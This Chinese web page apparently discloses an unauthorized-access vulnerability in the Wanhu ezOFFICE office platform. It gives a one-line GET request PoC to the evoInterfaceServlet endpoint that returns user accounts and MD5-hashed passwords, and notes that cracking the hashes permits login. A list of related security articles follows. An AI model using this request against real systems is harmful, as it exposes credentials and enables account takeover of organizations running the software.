万户协同办公平台 ezoffice简介

万户ezOFFICE集团版协同平台以工作流程、知识管理、沟通交流和辅助办公四大核心应用

漏洞描述

万户ezOFFICE协同管理平台是一个综合信息基础应用平台。万户ezoffice协同管理平台存在未授权访问漏洞，攻击者可以从evoInterfaceServlet接口获得系统登录账号和用MD5加密的密码。

漏洞poc

GET /defaultroot/evoInterfaceServlet?paramType=user HTTP/1.1
Host:

MD5解密可直接登录应用系统，由于数据敏感，不解密。从互联网上借一张登录成功的图

本栏目推荐文章
• 微信对话平台API开发
• OFBiz RCE漏洞复现（CVE-2023-51467）
• 云平台大数据系统需求有哪些？
• ThingsKit 物联网平台 可视化规则引擎发布
• 一键构建分布式云原生平台
• 猜数游戏C语言版(Windows平台)
• .net ocre 程序崩溃自动dump在多平台中的实现
• 提升办公效率用微服务快速开发平台怎么样？
• 安防视频监控平台智能边缘分析一体机：视频汇聚算法与区域入侵告警
• （openstack搭建）openstack云平台部署-详细完整教程

漏洞 ezoffice 平台漏洞ezoffice平台 upload-labs漏洞upload平台 ezoffice 漏洞 电信 平台 信息 漏洞sqli-labs docker平台 漏洞 园区 智慧 平台 漏洞 平台 漏洞 漏洞xxe 漏洞分析